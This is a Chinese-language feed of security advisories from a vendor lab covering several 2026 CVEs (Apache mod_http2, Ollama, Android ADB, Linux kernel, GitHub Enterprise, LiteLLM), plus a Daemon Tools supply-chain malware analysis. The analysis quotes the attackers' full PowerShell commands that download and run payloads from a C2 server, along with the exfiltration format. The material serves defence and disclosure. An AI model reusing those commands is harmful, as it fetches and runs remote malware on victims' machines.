2026年5月7日,Apache Http Server组件披露内存破坏漏洞,漏洞编号:CVE-2026-23918,漏洞威胁等级:高危。

漏洞名称:

Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918)

组件名称:

Apache Http Server

影响范围:

Apache Http Server = 2.4.66

漏洞类型:

内存破坏

利用条件:

1、用户认证:无需用户认证

2、前置条件:

  • 采用 event/worker 多线程 MPM;

  • 服务开启 HTTP/2 并加载 mod_http2 模块。

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需授权即可造成拒绝服务。

<综合评定威胁等级>:高危,可造成拒绝服务。

官方解决方案:

已发布

漏洞分析

组件介绍

Apache HTTP Server(简称Apache),是Apache软件基金会的一个开放源代码的网页服务器,可以在大多数电脑操作系统中运行,由于其具有的跨平台性和安全性,被广泛使用,是最流行的Web服务器端软件之一。

漏洞简介

2026年5月7日,Apache Http Server组件披露内存破坏漏洞,漏洞编号:CVE-2026-23918,漏洞威胁等级:高危。

Apache httpd 中存在双重释放漏洞,该漏洞源于 mod_http2 模块在处理 HTTP/2 协议早期重置帧的业务逻辑时存在内存管理缺陷,程序未对内存指针做合法校验与释放状态判断,处理异常 HTTP/2 数据流时对同一堆内存地址执行了两次释放操作,形成典型 Double Free 内存破坏问题,攻击者可远程构造恶意 HTTP/2 请求触发该漏洞,破坏堆内存结构,轻则造成拒绝服务,特定环境下还可借助内存布局可控特性实现远程代码执行。

影响范围

Apache Http Server = 2.4.66

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将 Apache HTTP Server 更新到 2.4.67 或更高版本。
参考链接:https://httpd.apache.org/security/vulnerabilities_24.html

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对Apache Http Server的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0005607。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0005607。

2、漏洞主动检测

支持对Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】规则ID:SF-2026-00908。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01019。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01019。

【深信服可拓展检测响应平台XDR】规则ID:SF-2026-00908。

参考链接

时间轴

2026/05/07

深瞳漏洞实验室监测到Apache HTTP Server mod_http2 双重释放漏洞信息。

2026/05/08

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Fri, 08 May 2026 16:49:00 +0800 网络安全信息与动态周报2026年第18期(4月27日-5月3日) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525526&idx=2&sn=c8961b713f0d04f93938d103465639a7 分享一篇文章。 深信服千里目安全技术中心 2026-05-08 16:49 北京

分享一篇文章。

国家互联网应急中心CNCERT: 网络安全信息与动态周报2026年第18期(4月27日-5月3日)

本周,互联网网络安全态势整体评价为良。

本周网络安全基本态势

本周,互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳,全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。

本周事件处理情况

本周,CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件280起,含跨境网络安全事件125起。其中,协调境内外域名注册机构、境外CERT等机构重点处理218起仿冒投诉事件。

近期回顾

网络安全信息与动态周报2026年第17期(4月20日-4月26日)

网络安全信息与动态周报2026年第16期(4月13日-4月19日)

网络安全信息与动态周报2026年第15期(4月6日-4月12日)

网络安全信息与动态周报2026年第14期(3月30日-4月5日)

网络安全信息与动态周报2026年第13期(3月23日-3月29日)

跳转微信打开

]]> Fri, 08 May 2026 16:49:00 +0800 【漏洞通告】Ollama 越界读取漏洞(CVE-2026-7482) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525496&idx=1&sn=855b158f3eedb70985dfb85471828ee9 2026年5月6日,深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息,漏洞编号:CVE-2026-7482,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-05-06 21:45 北京

2026年5月6日,深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息,漏洞编号:CVE-2026-7482,漏洞威胁等级:高危。

漏洞名称:

Ollama 越界读取漏洞(CVE-2026-7482)

组件名称:

Ollama

影响范围:

Ollama < 0.17.1

漏洞类型:

越界读取

利用条件:

1、用户认证:无需用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需授权即可读取内存中敏感信息。

<综合评定威胁等级>:高危,可读取内存中敏感信息。

官方解决方案:

已发布

漏洞分析

组件介绍

Ollama 是一个专注于本地部署大型语言模型的工具,通过提供便捷的模型管理、丰富的预建模型库、跨平台支持以及灵活的自定义选项,使得开发者和研究人员能够在本地环境中高效利用大型语言模型进行各种自然语言处理任务,而无需依赖云服务或复杂的基础设施设置。

漏洞简介

2026年5月6日,深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息,漏洞编号:CVE-2026-7482,漏洞威胁等级:高危。

Ollama 服务在解析处理 GGUF 格式模型文件时,未对文件声明的张量偏移量与大小进行边界校验,直接将其作为内存读取的依据,攻击者可构造恶意 GGUF 文件,通过伪造超出实际文件范围与合法内存区间的偏移及长度值,触发堆缓冲区越界读取,并且相关模型创建接口默认缺乏访问认证限制,未授权远程攻击者即可上传恶意文件利用该缺陷读取进程内存中的敏感信息。

影响范围

目前受影响的Ollama版本:

Ollama < 0.17.1

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将Ollama更新到最新版本。
下载链接:https://github.com/ollama/ollama/releases/tag/v0.17.1

临时修复建议

关闭未使用的功能模块,减少潜在攻击入口。

遵循最小权限原则,严控各类敏感操作权限范围。

非必要不暴露服务到公网,限制访问源为可信范围。

定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对Ollama的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0032100。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0032100。

2、漏洞主动检测

支持对Ollama 越界读取漏洞(CVE-2026-7482)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年05月08日发布检测方案,规则ID:SF-2026-00907。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01018。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01018。

【深信服可拓展检测响应平台XDR】预计2026年05月08日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00907。

3、漏洞安全监测

支持对Ollama 越界读取漏洞(CVE-2026-7482)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年05月11日发布监测方案,规则ID:11029716。

【深信服安全托管服务MSS】预计2026年05月11日发布监测方案(需要具备SIP组件能力),规则ID:11029716。

【深信服可拓展检测响应平台XDR】预计2026年05月11日发布监测方案,规则ID:11029716。

4、漏洞安全防护

支持对Ollama 越界读取漏洞(CVE-2026-7482)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年05月11日发布防护方案,规则ID:11029716。

【深信服Web应用防火墙WAF】预计2026年05月11日发布防护方案,规则ID:11029716。

【深信服安全托管服务MSS】预计2026年05月11日发布防护方案(需要具备AF组件能力),规则ID:11029716。

【深信服可拓展检测响应平台XDR】预计2026年05月11日发布防护方案(需要具备AF组件能力),规则ID:11029716。

参考链接

时间轴

2026/05/06

深瞳漏洞实验室监测到Ollama 越界读取漏洞信息。

2026/05/06

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 06 May 2026 21:45:00 +0800 【漏洞通告】Android ADB认证绕过漏洞(CVE-2026-0073) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525496&idx=2&sn=e47ded0c6c6b5367635dba0679275333 2026年5月6日,深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-0073,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-05-06 21:45 北京

2026年5月6日,深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-0073,漏洞威胁等级:高危。

漏洞名称:

Android ADB认证绕过漏洞(CVE-2026-0073)

组件名称:

Android System

影响范围:

Android 14
Android 15
Android 16
Android 16-qpr2

以上范围中未合入2026年5月安全补丁的版本。

漏洞类型:

绕过认证

利用条件:

1、用户认证:无需用户认证

2、前置条件:①设备开启 Developer options 和 Wireless debugging 或暴露 ADB TCP 服务。②设备/data/misc/adb/adb_keys文件包含至少一个先前配对的 RSA ADB 主机密钥。③攻击者能够访问该 ADB TCP 端口,例如处于同一局域网。

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需认证即可获取目标shell。

<综合评定威胁等级>:高危,零点击即可获取目标shell。

官方解决方案:

已发布

漏洞分析

组件介绍

Android System 是安卓操作系统的核心层,负责管理硬件资源、进程调度、内存分配以及提供基础的系统服务(如应用启动、网络通信、权限控制等),是所有应用运行的基础环境。

漏洞简介

2026年5月6日,深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-0073,漏洞威胁等级:高危。

auth.cpp 文件内的 adbd_tls_verify_cert 函数存在逻辑漏洞,攻击者可借此绕过无线 ADB 双向认证握手流程。攻击成功后,无需额外权限与用户交互,即可在设备的 shell 用户权限下执行任意代码,实现近距离远程代码执行。

影响范围

目前受影响的Android System版本:

Android 14
Android 15
Android 16
Android 16-qpr2

以上范围中未合入 2026 年 5 月安全补丁的版本。

解决方案

官方修复建议

官方已发布 2026 年 5 月安全补丁修复该漏洞,建议受影响用户及时将 Android 设备更新至最新安全补丁。受影响的 AOSP 版本包括 Android 14、15、16、16-qpr2。
参考链接:https://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=zh-cn

临时修复建议

关闭未使用的功能模块,减少潜在攻击入口。

遵循最小权限原则,严控各类敏感操作权限范围。

非必要不暴露服务到公网,限制访问源为可信范围。

定期更新系统及各类组件至安全版本,及时修补已知隐患。

参考链接

时间轴

2026/05/06

深瞳漏洞实验室监测到Android ADB认证绕过漏洞信息。

2026/05/06

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 06 May 2026 21:45:00 +0800 【恶意文件通告】Daemon Tools 官方安装包供应链污染事件 https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525496&idx=3&sn=4b2ee8a0630c8f3ccd827f1e5ba79bf7 近期,深信服千里目安全技术中心监测到一起针对广受欢迎的虚拟光驱软件DAEMON TOOLS的大规模供应链投毒攻击。 深瞻情报实验室 2026-05-06 21:45 北京

近期,深信服千里目安全技术中心监测到一起针对广受欢迎的虚拟光驱软件DAEMON TOOLS的大规模供应链投毒攻击。攻击者成功渗透其开发商 AVB Disc Soft 的软件发布渠道,将恶意载荷注入从官网分发的安装程序,并以有效的开发者数字签名完成签署,使安全工具难以识别。

攻击自2026年4月8日开始,持续至报告撰写之时,涉及版本 12.5.0.2421 至 12.5.0.2434。感染波及全球逾100个国家和地区,但攻击者仅对极少数(约十余台)高价值目标机器部署后续有效载荷,显示出明显的精准化定向攻击意图。

恶意文件概要

事件名称

Daemon Tools 官方安装包供应链污染事件

发布时间

202656

威胁类型

供应链攻击、后门植入、远程控制(RAT

简单描述

攻击者通过攻破Daemon Tools 官方分发渠道,在合法的软件安装包中植入恶意后门代码,导致全球大量下载该工具的用户面临系统被完全控制的风险。

关键特征

官方签名绕过、多阶段载荷投递、隐蔽的C2 通信、针对虚拟光驱工具用户的精准打击。

事件详述

攻击背景与起因

近期,知名虚拟光驱工具 Daemon Tools 的官方分发链遭到污染。攻击者成功入侵了 AVB Disc Soft 的软件发布基础设施。具体入侵路径目前尚未完全披露,但结合已知信息,可判断攻击者已获取:

  • 对构建/发布服务器或代码签名系统的访问权限

  • 修改发布二进制文件并以合法证书重新签名的能力

  • 将恶意安装包替换至官方下载服务器上的能力

攻击者于2026年3月27日——攻击正式启动约11天前——注册了一个仿冒合法域名 daemon-tools[.]cc 的C2域名(env-check.daemontools[.]cc),显示出精密的预谋策划能力。

影响范围与风险分析

卡巴斯基遥测数据显示,自2026年4月8日起,观察到数千次感染,100多个国家/地区的个人和机构受影响。受害者主要分布在俄罗斯、巴西、土耳其、西班牙、德国、法国、意大利和中国。

其中约10%为企业/组织机构,仅约12台机器部署了后续复杂载荷,涉及零售、科学、政府和制造行业(位于俄罗斯、白俄罗斯和泰国)。攻击意图目前不明确。

受影响场景

主要影响在 Windows 环境下使用 Daemon Tools 进行 ISO 镜像管理、游戏挂载或系统镜像制作的个人及企业用户。

高危场景: 开启了自动更新功能的用户,或在近期从官网下载并执行了安装程序的开发者与运维人员。

特征: 恶意代码在安装过程中静默运行,用户界面无任何异常提示,极具欺骗性。

攻击时间线

时间

事件详细说明

2026327

攻击者注册仿C2域名(env-check.daemontools[.]cc

202648

首批投毒安装包开始通过官网分发(版本12.5.0.2421

202648日起

数千次感染开始发生,攻击者收集受害者信息

20264—5月初

攻击者对约12台高价值目标机器手动部署二阶段后门

技术特征与攻击行为分析

本次攻击采用三阶段精心设计的攻击链,实现「广撒网→精准筛选→定向打击」的完整闭环,攻击者篡改了 DAEMON Tools 安装目录(默认路径:C:\Program Files\DAEMON Tools Lite)中的三个核心可执行文件,恶意代码被注入至 C 运行时库初始化代码(CRT init code)中,在程序启动时自动激活,在独立线程中运行后门逻辑,对用户完全透明,不影响软件正常功能。

篡改文件

篡改始功能说明

DTHelper.exe

DAEMON Tools 主辅助程序,负责核心虚拟驱动功能

DiscSoftBusServiceLite.exe

系统服务组件,开机自动启动,常驻后台

DTShellHlp.exe

Shell扩展辅助程序,集成右键菜单等系统功能

被篡改的程序在启动时会向 C2 服务器发送 GET 请求,URL格式如下:

https://env-check.daemontools[.]cc/2032716822411?s=<计算机全名>

该域名于2026年3月27日注册(攻击前约11天),为合法域名 daemon-tools[.]cc 的 Typo-squatting 仿冒。

初始信息收集(envchk.exe)

这是部署至几乎所有感染机器的第一阶段载荷,为一个 .NET 可执行文件(SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4),功能包括:

•收集系统MAC地址、主机名、DNS域名

•枚举正在运行的进程列表

•收集已安装软件列表

•获取系统语言/区域设置(Locale)

•将所有数据外泄至 C2 服务器:http://38.180.107[.]76

部署方式:C2 服务器返回以下格式的 PowerShell 命令执行下载和运行:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe

数据外泄格式:POST 请求体包含以下参数:

a=<MAC地址>&b=<主机名>&c=<DNS域名>&d=<进程列表>&e=<已安装软件>&f=<区域设置>

攻击者利用这些信息对受害者进行精准画像,从数千台感染机器中筛选出真正有价值的目标。代码中包含中文字符串。

轻量后门(cdg.exe)

仅部署至约12台经过筛选的高价值目标机器,为RC4加密的shellcode加载器,具备以下能力:

  • 下载并执行额外恶意载荷

  • 执行任意 shell 命令(通过cmd.exe)

  • 在内存中直接运行shellcode(无文件落地)

  • 通过POST请求向

http://38.180.107[.]76/79437f5edda13f9c066/version/check 发送心跳包

部署方式:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp

该命令下载两个文件:cdg.exe(shellcode加载器)和 cdg.tmp(RC4加密的shellcode),使用密钥"first_match"解密后执行。

研究人员在部署脚本中发现了拼写错误,例如将 "cipher" 误写为 "chiper",强烈表明攻击者在此阶段实施了人工键盘操作,而非完全自动化,具有鲜明的真人参与特征。

QUIC RAT(高级远程访问木马)

已知仅部署至俄罗斯某教育机构的单台机器,是本次攻击中技术复杂度最高的植入物。主要技术特征:

  • 语言:C++ 实现,静态链接 WolfSSL 加密库

  • 混淆:控制流平坦化(Control Flow Flattening)深度混淆

  • C2协议多样性:支持 HTTP、UDP、TCP、WSS、QUIC、DNS、HTTP/3 共7种协议

  • 进程注入:可将恶意Payload注入 notepad.exe 和 conhost.exe 进程

  • 反分析:高度混淆设计

解决方案

建议处置流程

1. 重点监控 DTHelper.exe、DiscSoftBusServiceLite.exe 的异常网络连接

2. 检测向上述C2 IP/域名的出站HTTP GET请求

3. 监控 notepad.exe 和 conhost.exe 的异常进程注入行为

4. 检测系统中是否存在 cdg.exe 进程

5. 停止使用受影响版本的 Daemon Tools,并使用安全工具扫描残留。

6. 考虑到后门具备截获密码的能力,建议用户在清理系统后重置所有重要账号的密码。

7. 检查并删除 %TEMP% 及 %APPDATA% 目录下可疑的随机名 DLL 文件。

8. 仅安装官方确认安全的最新修复版本,并核对文件哈希值(Hash)。

IOC

DAEMON Tools Lite安装程序hash

hash

版本

9ccd769624de98eeeb12714ff1707ec4f5bf196d

12.5.0.2421

50d47adb6dd45215c7cb4c68bae28b129ca09645

12.5.0.2422

0c1d3da9c7a651ba40b40e12d48ebd32b3f31820

12.5.0.2423

28b72576d67ae21d9587d782942628ea46dcc870

12.5.0.2424

46b90bf370e60d61075d3472828fdc0b85ab0492

12.5.0.2430

6325179f442e5b1a716580cd70dea644ac9ecd18

12.5.0.2431

bd8fbb5e6842df8683163adbd6a36136164eac58

12.5.0.2433

15ed5c3384e12fe4314ad6edbd1dcccf5ac1ee29

12.5.0.2434

恶意C2

env-check.daemontools[.]cc

38.180.107[.]76

MITRE ATT&CK:

Tactic

Technique

ID

说明

Initial Access

Supply Chain Compromise

T1195.002

污染官方软件分发渠道

Execution

User Execution

T1204.002

用户运行受污染的安装包

Persistence

Registry Run Keys

T1547.001

通过注册表实现自启动

Defense Evasion

Subvert Trust Controls

T1553.002

利用合法的数字签名逃避检测

参考链接

跳转微信打开

]]> Wed, 06 May 2026 21:45:00 +0800 【漏洞通告】Linux Kernel Copy Fail 本地权限提升漏洞(CVE-2026-31431) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525464&idx=1&sn=8acda386bfbde5ad1c91b714adbca8f2 2026年4月30日,深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息,漏洞编号:CVE-2026-31431,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-30 16:55 北京

2026年4月30日,深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息,漏洞编号:CVE-2026-31431,漏洞威胁等级:高危。

漏洞名称:

Linux Kernel Copy Fail 本地权限提升漏洞(CVE-2026-31431)

组件名称:

Linux Kernel

影响范围:

Ubuntu 24.04(LTS 6.17.0-1007-aws 及以下)
Amazon Linux 2023(6.18.8-9.213.amzn2023 及以下)
Red Hat Enterprise Linux 10
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 8
SUSE 16(6.12.0-160000.9-default 及以下)
Debian / Arch / Fedora / Rocky / Alma / Oracle等同期内核版本均受影响
受影响的内核提交范围:
commit 72548b093ee3 ≤ version < commit a664bf3d603d

漏洞类型:

权限提升

利用条件:

1、用户认证:需要用户认证

2、前置条件:默认配置

3、触发方式:本地

综合评价:

<综合评定利用难度>:中等,需要本地低权限执行条件。

<综合评定威胁等级>:高危,可提升至root权限。

官方解决方案:

已发布

漏洞分析

组件介绍

Linux内核(Linux Kernel)是一个开源的操作系统内核,它是Linux操作系统的核心组件,负责管理计算机的硬件资源,并提供了许多系统服务,如进程管理、内存管理、文件系统管理和设备驱动程序等。

漏洞简介

2026年4月30日,深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息,漏洞编号:CVE-2026-31431,漏洞威胁等级:高危。

Linux Kernel 的加密子系统 algif_aead 在处理 AEAD 接口的 in-place 操作时存在逻辑缺陷。该问题与 2017 年引入的 commit 72548b093ee3 有关,攻击者在具备本地低权限账户的情况下,可通过 AF_ALG、splice 与 authencesn 解密路径触发对文件 page cache 的可控写入,从而可能篡改只读文件或 SUID 程序在内存中的缓存内容,最终造成本地权限提升。该漏洞不能单独远程利用,但在共享主机、CI Runner、容器/多租户环境中风险较高。官方修复方式是回退 algif_aead 中不必要的 in-place 操作逻辑,并改为直接复制关联数据。

影响范围

Ubuntu 24.04(LTS 6.17.0-1007-aws 及以下)
Amazon Linux 2023(6.18.8-9.213.amzn2023 及以下)
Red Hat Enterprise Linux 10
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 8
SUSE 16(6.12.0-160000.9-default 及以下)
Debian / Arch / Fedora / Rocky / Alma / Oracle等同期内核版本均受影响
受影响的内核提交范围:
commit 72548b093ee3 ≤ version < commit a664bf3d603d

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户更新到最新版本。
下载链接:https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

风险资产发现

支持对Linux Kernel的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0006320。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0006320。

参考链接

时间轴

2026/04/30

深瞳漏洞实验室监测到Linux Kernel Copy Fail 本地权限提升漏洞信息。

2026/04/30

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Thu, 30 Apr 2026 16:55:00 +0800 【漏洞通告】Github-Enterprise远程命令执行漏洞(CVE-2026-3854) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525429&idx=1&sn=efffa2a9040316ec6d7753bd4b59e865 2026年4月29日,深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-3854,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-04-29 20:25 北京

2026年4月29日,深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-3854,漏洞威胁等级:高危。

漏洞名称:

Github-Enterprise远程命令执行漏洞(CVE-2026-3854)

组件名称:

Github-Enterprise

影响范围:

GitHub Enterprise Server ≤ 3.19.1

漏洞类型:

命令执行

利用条件:

1、用户认证:需要用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:困难,需要经过认证且拥有推送权限的用户。

<综合评定威胁等级>:高危,能造成远程代码执行。

官方解决方案:

已发布

漏洞分析

组件介绍

GitHub企业云是一个针对大型企业或团队在GitHub.com上进行合作的计划。

漏洞简介

2026年4月29日,深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-3854,漏洞威胁等级:高危。

GitHub Enterprise Server是美国GitHub开源的一个应用软件。提供一个将自己的GitHub实例设置为虚拟设备,从而提供可扩展,易于管理的平台。

GitHub Enterprise Server 3.14.24版本、3.15.19版本、3.16.15版本、3.17.12版本、3.18.6版本和3.19.3版本存在安全漏洞,该漏洞源于对推送选项值中和不当,可能导致远程代码执行。

影响范围

目前受影响的Github-Enterprise版本:

GitHub Enterprise Server ≤ 3.19.1

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将GitHub Enterprise Server升级到如下版本:
GitHub Enterprise Server 3.14.25 或更高版本
GitHub Enterprise Server 3.15.20 或更高版本
GitHub Enterprise Server 3.16.16 或更高版本
GitHub Enterprise Server 3.17.13 或更高版本
GitHub Enterprise Server 3.18.7 或更高版本
GitHub Enterprise Server 3.19.4 或更高版本
GitHub Enterprise Server 3.20.0 或更高版本
下载链接:
https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.25
https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.20
https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.16
https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.13
https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.7
https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.4

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对Github-Enterprise的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0001349。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0001349。

2、漏洞主动检测

支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年05月06日发布检测方案,规则ID:SF-2026-00906。

【深信服漏洞评估工具TSS】预计2026年05月30日发布检测方案,规则ID:SF-2026-01017。

【深信服安全托管服务MSS】预计2026年05月30日发布检测方案(需要具备TSS组件能力),规则ID:SF-2026-01017。

【深信服可拓展检测响应平台XDR】预计2026年05月06日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00906。

3、漏洞安全监测

支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年05月11日发布监测方案,规则ID:11220423。

【深信服安全托管服务MSS】预计2026年05月11日发布监测方案(需要具备SIP组件能力),规则ID:11220423。

【深信服可拓展检测响应平台XDR】预计2026年05月11日发布监测方案,规则ID:11220423。

4、漏洞安全防护

支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年05月11日发布防护方案,规则ID:11220423。

【深信服Web应用防火墙WAF】预计2026年05月11日发布防护方案,规则ID:11220423。

【深信服安全托管服务MSS】预计2026年05月11日发布防护方案(需要具备AF组件能力),规则ID:11220423。

【深信服可拓展检测响应平台XDR】预计2026年05月11日发布防护方案(需要具备AF组件能力),规则ID:11220423。

参考链接

时间轴

2026/04/29

深瞳漏洞实验室监测到Github-Enterprise远程命令执行漏洞信息。

2026/04/29

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 29 Apr 2026 20:25:00 +0800 【漏洞通告】LiteLLM SQL注入漏洞(CVE-2026-42208) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525429&idx=2&sn=576d9806998fdf7f0dbf7b40e17dcfcb 2026年4月28日,深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息,漏洞编号:CVE-2026-42208,漏洞威胁等级:严重。 深瞳漏洞实验室 2026-04-29 20:25 北京

2026年4月28日,深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息,漏洞编号:CVE-2026-42208,漏洞威胁等级:严重。

漏洞名称:

LiteLLM SQL注入漏洞(CVE-2026-42208)

组件名称:

LiteLLM

影响范围:

1.81.16≤version<1.83.7

漏洞类型:

SQL注入

利用条件:

1、用户认证:无需用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,无需授权即可造成SQL注入。

<综合评定威胁等级>:高危,能造成信息泄露。

官方解决方案:

已发布

漏洞分析

组件介绍

LiteLLM是一款AI工具产品,该产品旨在为用户提供一个统一的API,以便访问和管理100多个LLM服务,它的核心功能是简化LLM的集成过程,帮助用户跟踪LLM使用情况,并设置预算和速率限制。

漏洞简介

2026年4月28日,深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息,漏洞编号:CVE-2026-42208,漏洞威胁等级:严重。

CVE-2026-42208是 LiteLLM 一个认证流程 SQL 注入漏洞。由于系统在处理Authorization头的鉴权令牌时,未做过滤和预处理,导致攻击者可在认证阶段构造恶意token注入SQL。该漏洞位于身份认证失败后的错误日志机制,影响所有触发认证逻辑的接口,攻击者无需有效凭据即可执行数据库查询,可能导致敏感信息泄露甚至远程控制系统。

影响范围

